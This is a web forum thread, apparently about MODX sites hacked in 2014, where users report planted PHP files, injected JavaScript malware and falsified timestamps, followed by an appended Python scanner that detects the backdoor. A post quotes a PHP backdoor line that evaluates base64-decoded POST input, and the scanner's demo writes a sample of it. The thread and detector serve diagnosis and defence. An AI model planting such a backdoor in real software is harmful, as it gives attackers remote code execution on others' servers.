Oh, this was an Evo thread. I didn't want to hijack it. Anyway, it belongs together somehow.
-
- 17 Posts
Hello,
I started this thread....
First: Great that so many people give responses and feedback!
But....
Everybody is talking about another old hack. This hack, which everybody is talking about, is installed by old files from 10.0.x. When you update to 10.0.14 it's possible the installed hack files are not gone and can still be used by the hacker. The hacker installed random .php files with an encrypted code and sometimes starts it with a code <?php eval(base64_decode($_POST['<random_string_here>']));?> When he starts the code, the server starts to spam mail. In no time your server is on a blacklist...
I am talking about something else.....
Some of my sites were offline because of hacker-installed malware. Google noticed this and immediately blocked the site with a warning message, and no happy clients....
The hacker infected all of my .js files with the code you find in the attachment
My question is, how could this happen and how can I prevent this...
[ed. note: yoman last edited this post 9 years, 7 months ago.]
-
- 230 Posts
Same here (like Spheerys described above) - and I was pretty sure that we'd cleaned everything when we updated to 1.0.14.
Modified files were from last week.
In this case we also replaced the manager and assets folders completely and found that there is a newer library available for
/assets/snippetes/phpthumb/phpthumb.class.php
(updated to Version 1.7.13-201406261000)
That might be a new vulnerability, but I'm not absolutely sure.
-
- 463 Posts
I just got asked to look at a crippled MODX site. I'm seeing the same hack, with every .js file on the site affected with the script as mentioned by Yoman.
It also gets mentioned here along with a possible clean-up script:
http://blog.lux-medien.com/2014/09/how-to-fix-actermoto-and-its-edited-javascript-files/
-
- 230 Posts
Quote from: Jako at Sep 17, 2014, 08:39 AM
This phpthumb version is already in the bugfix branch. But I don't think that it has those security issues (see changelog).
Do you have an access log around the time the files were modified?
Unfortunately not.
-
- 409 Posts
Could it be possible that the malware is hiding itself in the database?
For example, if we delete blog.php (or similar), like "magic", the malicious code recreates it from the database?
-
- 230 Posts
Quote from: Spheerys at Sep 17, 2014, 09:11 AM
Could it be possible that the malware is hiding itself in the database?
For example, if we delete blog.php (or similar), like "magic", the malicious code recreates it from the database?
Possible? Yes. But not very likely. You can test that with a dump of your database and a text search against the content of your blog.php.
edit: typos
-
- 463 Posts
What I know so far if it helps...
Timestamps on the server don't give any clue, as they are falsified to make it look like they are older.
Seems like .php files are 'planted' around 60 days before injection into .js files happens.
Can't find anything in the database that indicates it's compromised.
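As an added example that is not from this thread or from MODX itself, here is a small Python scanner that checks a web root (and a database dump placed in it, as Jako suggested) for the eval(base64_decode($_POST[...])) shape quoted above, and flags files whose modification time was backdated: touch can rewrite mtime but not the inode change time (ctime), so an mtime far older than ctime is a sign the timestamp was falsified. The .js payload from the attachment is not on the page, so no signature for it is assumed; the sample web root built in demo() is constructed for the example.

```python
import os
import re
import tempfile
import time

# Shape of the backdoor quoted in the thread: eval(base64_decode($_POST['<random>'])).
# The POST key changes per infection, so the regex matches the call structure instead.
BACKDOOR_RE = re.compile(rb"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[", re.I)
SCAN_SUFFIXES = (".php", ".phtml", ".inc", ".js", ".sql")  # .sql covers a database dump

def scan_file(path):
    """Return findings for one file: backdoor pattern and/or a falsified timestamp."""
    findings = []
    st = os.stat(path)
    # touch/utime can backdate mtime but not ctime (inode change time), so an mtime
    # well before ctime means the visible timestamp was rewritten after the change.
    if st.st_mtime + 60 < st.st_ctime:
        findings.append("mtime older than ctime: timestamp likely falsified")
    if path.lower().endswith(SCAN_SUFFIXES):
        with open(path, "rb") as fh:
            if BACKDOOR_RE.search(fh.read()):
                findings.append("eval(base64_decode($_POST[...])) backdoor pattern")
    return findings

def scan_tree(root):
    """Walk root and map each relative path that has findings to its list of findings."""
    results = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            found = scan_file(full)
            if found:
                results[os.path.relpath(full, root)] = found
    return results

def demo():
    """Build a constructed sample web root in a temp dir and scan it."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "assets"))
    # constructed: planted dropper, backdated by 60 days like the thread describes
    planted = os.path.join(root, "assets", "blog.php")
    with open(planted, "wb") as fh:
        fh.write(b"<?php /* x */ eval(base64_decode($_POST['q7Zk']));?>")
    old = time.time() - 60 * 86400
    os.utime(planted, (old, old))
    # constructed: clean file, untouched timestamps
    with open(os.path.join(root, "index.php"), "wb") as fh:
        fh.write(b"<?php echo 'hello'; ?>")
    return scan_tree(root)
```

Run scan_tree() against a copy of the site and the dumped database; a hit on a .sql file supports Spheerys' theory, while a hit on a .php file with a backdated mtime matches what the last post describes.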